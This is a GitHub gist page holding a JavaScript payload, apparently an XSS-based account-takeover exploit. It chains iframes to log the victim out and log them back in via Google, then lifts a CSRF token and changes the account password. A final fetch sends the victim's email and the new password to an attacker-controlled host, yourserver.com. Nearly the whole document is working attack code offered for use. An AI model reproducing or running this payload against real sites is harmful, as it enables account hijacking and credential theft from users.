-
-
Save yourbuddy25/75080f317a464ca8a46acd8e5b5f8be6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//getting logout url with csrf token from source | |
var y = JSON.parse(document.getElementById('conf').innerHTML); | |
var url = y.user.link.logOut | |
//First iframe to logout | |
var profileIframe = document.createElement('iframe'); | |
profileIframe.setAttribute('src', 'https://example.com'+url); | |
profileIframe.setAttribute('id', 'pi'); | |
document.body.appendChild(profileIframe); | |
document.getElementById('pi').onload = function() { | |
//second iframe to login to victims google account | |
var profileIframe1 = document.createElement('iframe'); | |
profileIframe1.setAttribute('src', 'https://example.com/login'); | |
profileIframe1.setAttribute('id', 'lo1'); | |
document.body.appendChild(profileIframe1); | |
//waiting for 30 seconds for the iframe to load properly | |
document.getElementById('lo1').onload = function() { | |
setTimeout(function(){ load() }, 30000) | |
function load() | |
{ | |
let iframe = document.getElementById('lo1'); | |
let inner = iframe.contentDocument || iframe.contentWindow.document; | |
//Clicked google login in iframe to login to victim | |
inner.getElementsByClassName("g_login")[1].click(); | |
} | |
//wait 40 seconds to t login fully | |
setTimeout(function(){ takeover() }, 40000) | |
function takeover() | |
{ | |
//Getting users parameters page url from source | |
let iframe_second = document.getElementById('lo1'); | |
let inner1 = iframe_second.contentDocument || iframe_second.contentWindow.document; | |
var z = JSON.parse(inner1.getElementById('conf').innerHTML); | |
var param = z.user.link.parameter; | |
// opens third iframe to steal csrf token for pass change | |
var profileIframe2 = document.createElement('iframe'); | |
profileIframe1.setAttribute('src', 'https://example.com'+param); | |
profileIframe1.setAttribute('id', 'lo2'); | |
document.body.appendChild(profileIframe2); | |
//waiting 50 seconds to let the third iframe load fully | |
document.getElementById('lo2').onload = function() { | |
setTimeout(function(){ csrf() }, 50000) | |
//Stealing csrf token from parameters page | |
function csrf() { | |
let iframe_csrf = document.getElementById('lo2'); | |
let inner_csrf = iframe_csrf.contentDocument || iframe_csrf.contentWindow.document; | |
var csrf = inner_csrf.getElementById("password__token").value; | |
//account takover | |
var xhr = new XMLHttpRequest(); | |
xhr.open("POST", "https://example.com"+param+"/password", true); | |
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); | |
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); | |
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded"); | |
xhr.withCredentials = true; | |
var body = "setNewPassword_first=passwordQ!&setNewPassword_second=passwordQ!&setNewPassword%5Bcreate%5D=&setNewPassword%5B_token%5D="+csrf; | |
var aBody = new Uint8Array(body.length); | |
for (var i = 0; i < aBody.length; i++) | |
aBody[i] = body.charCodeAt(i); | |
xhr.send(new Blob([aBody])); | |
//send credentials,token to attacker | |
fetch("https://yourserver.com/email_password?=Email:"+localStorage.getItem('user_email')+" password:passwordQ!") | |
} | |
} | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment